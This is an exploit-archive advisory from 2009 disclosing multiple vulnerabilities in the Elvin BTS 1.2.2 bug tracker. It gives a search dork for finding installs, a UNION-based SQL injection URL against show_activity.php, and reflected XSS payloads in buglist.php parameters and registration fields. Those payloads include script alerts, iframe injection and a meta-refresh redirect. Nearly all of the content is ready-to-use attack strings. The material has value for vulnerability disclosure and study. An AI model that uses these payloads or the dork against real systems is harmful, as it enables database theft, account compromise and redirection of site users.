elvinbts-sqlxss.txt

Posted on 08 July 2009

)-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=(
(  [-] Elvin BTS 1.2.2 Multiple Remote VUlnerabilities 		 )
) [-] Official SITE : http://www.elvinbts.org/ 		(
(  [-] Dork : Powered by Elvin Bug Tracking Server.      	 )
)--------------------------------------------------------------(
(  [-] Discovered By 599eme Man					 )
) [-] Flouf@live.fr						(
(  [-] BIG THANKS TO : Moudi ;)					 )
)--------------------------------------------------------------(
(-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=)


[+] -- Bug SQL --

http://landfill.elvinbts.org/show_activity.php?id=sql


Demo:

http://landfill.elvinbts.org/show_activity.php?id=null+union+select+1,2,3,4,5,version(),7,8--



[+] -- Bug XSS ( iframe - redirect ) --

http://landfill.elvinbts.org/buglist.php?component=xss

http://landfill.elvinbts.org/buglist.php?priority=xss


Demo:


http://landfill.elvinbts.org/buglist.php?component=%22%27%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E

http://landfill.elvinbts.org/buglist.php?priority=%22%27%3E%3Cscript%3Ealert(%27xss%27)%3C/script%3E

http://landfill.elvinbts.org/buglist.php?component=%22%27%3E%3Ciframe%20src=%22http://google.com%22%3E%3C/iframe%3E

http://landfill.elvinbts.org/buglist.php?priority=%22%27%3E%3Ciframe%20src=%22http://google.com%22%3E%3C/iframe%3E

http://landfill.elvinbts.org/buglist.php?component=<meta http-equiv="Refresh" content="0; url=http://www.google.com">

http://landfill.elvinbts.org/buglist.php?priority=<meta http-equiv="Refresh" content="0; url=http://www.google.com">


username : "'><script>alert('xss')</script>
email : "'><script>alert('xss')</script>
pass : "'><script>alert('xss')</script>
confirm pass : "'><script>alert('xss')</script>


[-] Discovered By 599eme Man
[-] Flouf@live.fr
[-] BIG THANKS TO : Moudi.


_________________________________________________________________

http://www.windowslive.fr/messenger/1.asp
TOP
Malware :

None in database
Last 20
Exploits :

Last 20